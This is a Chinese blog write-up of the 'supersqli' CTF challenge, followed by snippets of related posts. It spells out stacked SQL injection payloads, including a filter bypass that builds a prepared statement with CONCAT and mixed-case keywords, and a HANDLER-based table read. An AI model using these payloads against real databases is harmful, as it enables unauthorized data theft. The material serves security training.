supersqli(sql注入)

最新推荐文章于 2023-03-30 23:41:06 发布
最新推荐文章于 2023-03-30 23:41:06 发布
阅读量981 收藏 1
点赞数
分类专栏: CTF
原文链接:https://blog.csdn.net/nicesa/article/details/106390405
版权

12 supersqli(sql注入)

知识点

  1. 堆叠注入是重点
  2. 预编译 https://blog.csdn.net/Just__2009/article/details/109126437

在这里插入图片描述
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。 堆叠的语句是任意的而union只能用来查询

堆叠注入原理

1.输入1’发现不回显,然后1’ #显示正常,应该是存在sql注入了
使用单引号报错,说明有注入的漏洞
error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’’ at line 1

‘1 order by 2# 然后试试

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
order by 2的时候页面正常回显,order by 3的时候页面出错,所以我们知道只有两个字段。

使用这种—1’ union select 1,2#
在这里插入图片描述

发现select 被过滤了。

叠合注入

-1’;show tables # 显示表有哪些

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
所以我们找到flag在第一个表中,那么接下来我们要查看flag中的内容,但是这里select被过滤了,所以我们必须得绕过这个过滤,怎么绕过呢?我们可以采用预编译的方式进行绕过。

-1’;set @sql = CONCAT(‘sele’,‘ct * from 1919810931114514;’);prepare aaa from @sql;EXECUTE aaa;#

但是当我们执行预编译语句的时候出现下图结果:
在这里插入图片描述

所以这里还同时过滤了set和prepare,那我们同时也要绕过它,如何绕过,我们可以采用大小写的形式进行绕过(经尝试,双写无法绕过)

1’;sEt @sql = CONCAT(‘sele’,‘ct * from 1919810931114514;’);prepArE aaa from @sql;EXECUTE aaa;#
在这里插入图片描述
到这里,拿到flag

方法2
handler查询

mysql可以使用select查询表中的数据,也可使用handler语句,这条语句是一行一行的浏览一个表中的数据。
handler可以用于MyISAM和InnoDB表。
使用方法:
handler table_name open打开一张表
handel table_name read first读取第一行内容,
handel table_name read next依次获取其它行
最后一行执行之后再执行handel table_name read next会返回一个空的结果。

-1’;handler 1919810931114514 open;handler 1919810931114514 read first;#

上面payload是两个语句,一个是打开表,一个是读表中的第一行字段中的内容
在这里插入图片描述
方法4
这里看到别人分享的一个解题思路,感觉姿势挺独特,介绍一下
修改表名和列名

ZJL_19
关注
专栏目录
【网络安全 | CTF】攻防世界 supersqli 解题详析
等风来
05-27 3383
堆叠注入(stacked injection)是一种SQL注入攻击的技术手段,它会在同一行代码中多次使用已知的SQL注入漏洞,从而达到绕过安全措施、执行恶意代码和窃取数据库信息等目的。堆叠注入攻击利用了SQL语句的连贯性,通过在查询语句中嵌入多个SELECT语句或在UPDATE语句中嵌入多个SET赋值的情况来强行插入额外的恶意代码段。表示注释掉其后面的内容,因此程序会执行两次SQL语句,并忽略掉密码的条件,最终返回敏感数据的行数,从而达到了窃取数据库敏感信息的目的。断开原有语句,再插入新的SQL语句。
SQL Injection8(堆叠注入)——强网杯2019随便注
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠注入)——强网杯2019随便注 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便注是一道sql注入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠注入的知识,堆叠注入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠注入原理 在SQL中,...
SuperSQL注入.rar
07-21
一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 1.支持任意地点出现的任意SQL注入 2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
supersqli
怪味巧克力的博客
05-27 4536
0x01 拿到题目后,发现是单引号报错字符型注入 order by 2的时候页面正常回显,order by 3的时候页面出错,所以我们知道只有两个字段。 接下来union联合查询,发现select被过滤了 所以我们需要绕过select的过滤,下面有几种方法 0x02 堆叠查询+预编译 我们发现这里可以执行多sql语句,所以我们可以采用堆叠查询,那我们查询表名,结果如下: 查询表名中的列名,结果如下: 所以我们找到flag在第一个表中,那么接下来我们要查看flag中的内容,但是这里select被过滤了
supersqli(SQL注入流程及常用SQL语句)
最新发布
Welcome To Myon'Blog !
03-30 903
一、SQL注入知识学习 1、判断注入类型 (1)数字型注入判断 (2)字符型注入判断 2、猜解sql查询语句中的字段数(order by 的使用) 3、判断显示位爆数据库的名字 4、注释(--+的使用) 5、堆叠注入 6、handler语句及用法 二、基于上述知识对此题的分析与解答 1、注入点、注入类型 2、判断列数 3、利用or 1=1暴露表中数据 联合注入 (1)看数据库 (2)查表名 (3)查询表中的列 6、处理被过滤 7、handler、hackba的使用
SuperSQLEXEC
04-02
SuperSQLEXEC
Xctf练习sql注入--supersqli
weixin_45694388的博客
12-28 290
三种方法 方法一 =1 回显正常 =1’回显不正常,报sql语法错误 =1’ --+ 回显正常,说明有sql注入点,应该是字符型注入(# 不能用) =1’ order by 3 --+ 回显失败,说明有2个注入点 =1’ union select 1,2 --+ 回显显示过滤语句: =1’; show databases --+ 爆数据库名 =-1’; show tables --+ 绕过过滤,显示表下的列名 =1’;show columns from words --+ 尝试堆叠
小白SQL注入基础入门(持续修改)
MSB_WLAQ的博客
10-12 420
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 基于获取数据的方法 基于回显 基于错误 盲注 布尔型盲注 时间盲注 基于注入点位置分类(请求方法) 注入要判断是否有干扰 GET注入 Cookie注入 POST注入(登录框)REQUEST 注入 (全部接受) H
小白SQL注入基础入门详细解析
m0_55479420的博客
03-31 269
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 很多人学习python,不知道从何学起。 很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手。 很多已经做案例的人,却不知道如何去学习更加高深的知识。 那么针对这三类人,我给大家提供一个好的学习平台,免费
supersqlite:Python的增强型SQLite库
02-24
SuperSQLite:一个用于Python的增强SQLite库 一个功能丰富的Python软件包,可用于通过在Python中利用SQLite。 它旨在代替Python的内置 ,但没有任何限制。 它提供了独特的功能,例如以及。 SuperSQLite还与针对SQLite的预编译本机二进制文件一起打包,并且几乎针对每个平台都具有所有扩展名,以避免在安装过程中出现任何C / C ++编译器错误。 目录 安装 您可以使用pip安装此软件包: pip install supersqlite # Python 2.7 pip3 install supersqlite # Python 3 动机 是使用的快速流行的嵌入式数据库。 它是并且拥有数十亿的部署。 它在Python中具有绑定。 但是,Python绑定通常是针对SQLite的过时副本进行编译的,或者可能在将设置为较低级别的情况下进行编译。
超级SQL注入工具【SSQLInjection】V1.0 正式版 20200527.rar
04-10
超级SQL注入工具【SSQLInjection】V1.0 正式版 20200527
超级SQL注入工具【SSQLInjection】V1.0 正式版 20180809
10-23
软件运行需要.net framework 4.0,如未安装,请自行百度下载安装。
SuperSQLInjectionV1:超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包SQL注入工具,采用C#开发,直接操作TCP会话来进行HTTP交互,支持出现在HTTP协议任意位置SQL注入,支持各种类型SQL注入,支持HTTPS模式注入;支持以盲注、错误显示、Union注入等方式来获取数据;支持AccessMySQLSQLServerOraclePostgreSQLDB2SQLiteInformix等数据库;支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注
05-06
超级SQL注入工具 简介: 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包SQL注入工具,采用C#开发,程序采用自写代码来操作HTTP交互,支持出现在HTTP协议任意位置SQL注入,支持各种类型SQL注入,支持HTTPS模式注入;支持以盲注、错误显示、Union注入等方式来获取数据;支持Access/MySQL/SQLServer/Oracle/PostgreSQL/DB2/SQLite/Informix等数据库;支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。 工具特点: 1.支持任意地点出现的任意SQL注入。 2.支持全自动识别注入标记,也可人工识别注入并标记。 3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码
[攻防世界]supersqli
weixin_55466841的博客
04-30 254
输个单引号看看, 可以判断出来是字符型注入。 1' and 1=1# #有回显 1' and 1=2# #无回显 判断列数 1' order by 1# 1' order by 2# ... 2列。 用联合注入发现过滤了好多关键字 接下来用堆叠注入。 1'; show databases;# 1'; show tables;# ';show columns from `1919810931114514`;# ';show colu...
攻防世界-supersqli详解
Mr_helloword的博客
08-11 6606
supersqli 查看是否存在SQL注入 1' and 1=1 # 用二分法查看列数(有两列) 1' order by 2 # 使用联合查询发现做了SQL注入黑名单禁止出现以下关键字
攻防世界XCTF:supersqli
末初的CSDN博客
03-13 2380
加个单引号发现报错 比较烦的就是过滤了select 这样就无法进行查数据了,而且这里的/i就是忽略了大小写。无法进行大小写过滤 首先可以通过报错函数,把数据库给注入出来 -1' and extractvalue(1,concat(1,version()))-- + 版本信息:.18-MariaDB 数据库名称:supersqli 然后经过测试发现这里可以执行多条语句,也就是堆叠注入...
攻防世界——supersqli
weixin_62281892的博客
09-18 1845
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
攻防世界-supersqli
m0_63563528的博客
03-28 527
题目来源:强网杯 参考资料:金帛师傅的http://t.csdn.cn/KmxUY
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值